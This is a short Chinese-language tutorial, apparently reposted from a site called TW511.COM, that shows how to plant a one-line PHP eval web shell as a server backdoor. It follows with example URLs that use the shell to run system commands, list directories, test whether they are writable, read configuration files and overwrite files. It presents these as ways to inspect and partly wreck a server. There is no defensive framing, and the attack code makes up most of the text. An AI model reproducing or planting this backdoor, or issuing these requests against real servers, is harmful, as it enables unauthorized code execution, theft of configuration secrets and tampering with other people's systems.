首先,寫一個最簡單的後門,也可以叫做木馬。
<?php eval($_GET['evl']);
就這樣,你已經獲得了這台伺服器上的很多執行許可權。
那場景的用法有哪些呢?
列印伺服器phpinfo
http://www.test.com/a.php?evl=phpinfo()
檢視某個目錄下有什麼檔案
http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));檢視目錄是否可寫,接下裡就可以在可寫的目錄裡建立可執行檔案了
http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));獲取某個檔案的內容,一般用來讀取設定
http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));對某個可寫目錄進行寫檔案
http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));好了,以上基本已經可以完成對一個伺服器的檢視的部分破壞了,其他的功能就試著舉一反三吧。
以上就是PHP後門的一些用法的詳細內容,更多請關注TW511.COM其它相關文章!